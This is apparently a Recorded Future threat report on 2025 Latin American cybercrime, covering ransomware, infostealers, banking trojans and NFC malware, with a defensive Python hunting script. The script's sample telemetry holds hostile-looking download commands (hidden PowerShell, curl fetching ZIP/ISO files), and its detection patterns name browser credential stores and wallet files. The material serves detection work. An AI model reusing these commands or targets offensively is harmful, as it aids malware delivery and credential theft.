Latin America and the Caribbean Cybercrime Landscape
In 2025, the Latin America and the Caribbean (LAC) region faced escalating cybercriminal activity driven by rapid digital adoption and economic instability. Threat actors heavily utilized Telegram and dark web forums to distribute ransomware, banking trojans, and infostealers, increasingly targeting the healthcare, manufacturing, and government sectors while adapting to law enforcement disruptions.
Authors: Insikt Group, Recorded Future
Source: Recorded Future
Figure: hxxps://transparenciapresupuestaria[.]hermosillo[.]gob[.]mx, website defaced by the Chronus Team hacktivist group (identified via image analysis)
Key Takeaways
- DarkForums and Telegram are the primary communication and special-access platforms for threat actors targeting the LAC region.
- Healthcare, manufacturing, and government were the top industries targeted by ransomware in LAC, with 452 incidents recorded in 2025.
- LummaC2 was the most prolific infostealer in H1 2025, followed by Vidar in H2 after LummaC2 faced law enforcement disruption.
- Banking trojans increasingly leverage WhatsApp for delivery, targeting the region's heavy reliance on mobile banking and Android devices.
- Novel NFC-exploiting malware like PhantomCard and RelayNFC are emerging to target contactless payment systems in Brazil.
Affected Systems
- Android mobile devices
- Windows OS
- Healthcare systems
- Government networks
- Financial sector infrastructure
- Contactless payment systems (NFC/POS)
- SOHO routers and IoT appliances
Attack Chain
Threat actors typically gain initial access via phishing (email, SMS, WhatsApp) or by exploiting exposed credentials and vulnerable remote access infrastructure (RDP, VPNs). Once inside, they deploy infostealers (like LummaC2 or Vidar) to harvest credentials or banking trojans to intercept financial transactions. For extortion, actors escalate privileges, exfiltrate sensitive data, and deploy ransomware payloads, utilizing double-extortion tactics to force payment.
Detection Availability
- YARA Rules: Yes
- Sigma Rules: Yes
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
- Platforms: Recorded Future Insikt Group
The report indicates that Recorded Future's Insikt Group has developed YARA rules for detecting the Mispadu banking trojan and Sigma rules for detecting the Astaroth (Guildma) malware.
Detection Engineering Assessment
- EDR Visibility: High — EDR solutions are highly effective at detecting the execution of known infostealers, banking trojans, and ransomware payloads, as well as the behavioral anomalies associated with credential dumping and file encryption.
- Network Visibility: Medium — While C2 communication can be detected, threat actors heavily utilize end-to-end encrypted messaging platforms like Telegram and WhatsApp, which obscures payload delivery and C2 traffic.
- Detection Difficulty: Moderate — The reliance on established malware families (LummaC2, Vidar, Grandoreiro) provides known signatures and behaviors, but the use of legitimate platforms (WhatsApp, Telegram) for distribution and C2 complicates network-level detection.
Required Log Sources
- Process Creation (Event ID 4688)
- Network Connections
- File System Changes
- DNS Queries
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for unusual outbound network connections from endpoint devices to Telegram API endpoints, which may indicate C2 communication or data exfiltration by infostealers. | Network flow logs, DNS queries | Command and Control | High (if Telegram is permitted for corporate use) |
| Search for suspicious child processes spawned by PDF readers or web browsers, particularly those executing PowerShell or downloading ZIP/ISO files, indicating potential banking trojan delivery. | EDR process telemetry | Execution | Low |
| Monitor for unexpected modifications to browser credential stores or cryptocurrency wallet files, which are primary targets for infostealers like LummaC2 and Vidar. | File integrity monitoring, EDR file events | Credential Access | Low |
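The second and third hypotheses in the table as runnable hunting logic, added here as an example and not part of the report or Insikt Group's Sigma/YARA content. The event shape, process names and file paths are assumptions in a Sysmon/EDR-like form, and the sample telemetry is constructed; the file check deliberately ignores a browser writing its own credential store, which is what keeps the table's FP risk for that hypothesis low.

```python
import re

# Hypothesis 2: PDF readers or browsers spawning script hosts or fetching ZIP/ISO files.
DOCUMENT_PARENTS = {"acrord32.exe", "foxitreader.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
ARCHIVE_FETCH = re.compile(r"https?://\S+\.(?:zip|iso)\b", re.IGNORECASE)
# Hypothesis 3: anything but the owning browser touching credential stores or wallet files.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
CREDENTIAL_STORE = re.compile(r"(?:\\User Data\\[^\\]+\\Login Data"  # Chromium-based browsers
                              r"|\\Profiles\\[^\\]+\\logins\.json"   # Firefox
                              r"|\\wallet\.dat)$", re.IGNORECASE)    # Bitcoin Core style wallet

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_process(ev):
    """Return a reason if a process-creation event matches hypothesis 2, else None."""
    parent, child = basename(ev["parent_image"]), basename(ev["image"])
    if parent not in DOCUMENT_PARENTS:
        return None
    if child in SCRIPT_CHILDREN:
        return f"{parent} spawned {child}"
    if ARCHIVE_FETCH.search(ev.get("command_line", "")):
        return f"{parent} spawned {child} fetching a ZIP/ISO"
    return None

def check_file(ev):
    """Return a reason if a file event matches hypothesis 3 (browser-owned writes are expected)."""
    actor = basename(ev["image"])
    if actor not in BROWSERS and CREDENTIAL_STORE.search(ev["target"]):
        return f"{actor} touched {ev['target']}"
    return None

def hunt(events):
    """Run both checks over mixed telemetry; return (event id, reason) pairs."""
    checks = {"process": check_process, "file": check_file}
    return [(ev["id"], r) for ev in events if (r := checks[ev["type"]](ev))]

# Constructed sample telemetry (not real logs); paths are shortened placeholders.
def proc(i, parent, image, cmdline=""):
    return {"id": i, "type": "process", "parent_image": parent, "image": image, "command_line": cmdline}
def fileev(i, image, target):
    return {"id": i, "type": "file", "image": image, "target": target}
SAMPLE_EVENTS = [
    proc(1, r"C:\Apps\chrome.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -w hidden -c iwr http://example.invalid/factura.zip"),
    proc(2, r"C:\Apps\AcroRd32.exe", r"C:\Windows\System32\curl.exe", "curl -o nota.iso http://example.invalid/nota.iso"),
    proc(3, r"C:\Apps\chrome.exe", r"C:\Apps\chrome.exe", "chrome --type=renderer"),  # normal browser child
    fileev(4, r"C:\Apps\chrome.exe", r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    fileev(5, r"C:\Users\u\AppData\Local\Temp\update.exe", r"C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    fileev(6, r"C:\Users\u\AppData\Local\Temp\update.exe", r"C:\Users\u\AppData\Roaming\Bitcoin\wallet.dat"),
]
```

`hunt(SAMPLE_EVENTS)` flags events 1, 2, 5 and 6 and leaves the renderer child and the browser's own store write alone.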
Control Gaps
- Lack of MFA on SaaS and remote access platforms
- Unrestricted use of WhatsApp/Telegram on corporate devices
- Legacy infrastructure and unpatched VPN/RDP gateways
Key Behavioral Indicators
- Execution of sideloaded APKs on Android devices
- Unexpected PowerShell execution from compressed archives
- Rapid, large-scale file encryption events
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Enforce Multi-Factor Authentication (MFA) across all remote access points (VPN, RDP) and SaaS applications.
- Block or restrict the use of unauthorized encrypted messaging apps (Telegram, WhatsApp) on corporate devices.
Infrastructure Hardening
- Update and patch legacy systems, particularly public-facing infrastructure and VPN gateways.
- Implement 'secure by design' principles and segment critical networks, especially in healthcare and government sectors.
User Protection
- Deploy Mobile Device Management (MDM) solutions to prevent the sideloading of unverified APKs on corporate mobile devices.
- Enhance endpoint protection to detect and block known infostealers and banking trojans.
Security Awareness
- Conduct targeted security awareness training focusing on localized phishing lures, WhatsApp-based social engineering, and the risks of downloading unofficial applications.
MITRE ATT&CK Mapping
- T1566.001 - Phishing: Spearphishing Attachment
- T1566.002 - Phishing: Spearphishing Link
- T1078 - Valid Accounts
- T1190 - Exploit Public-Facing Application
- T1056 - Input Capture
- T1555 - Credentials from Password Stores
- T1041 - Exfiltration Over C2 Channel
- T1486 - Data Encrypted for Impact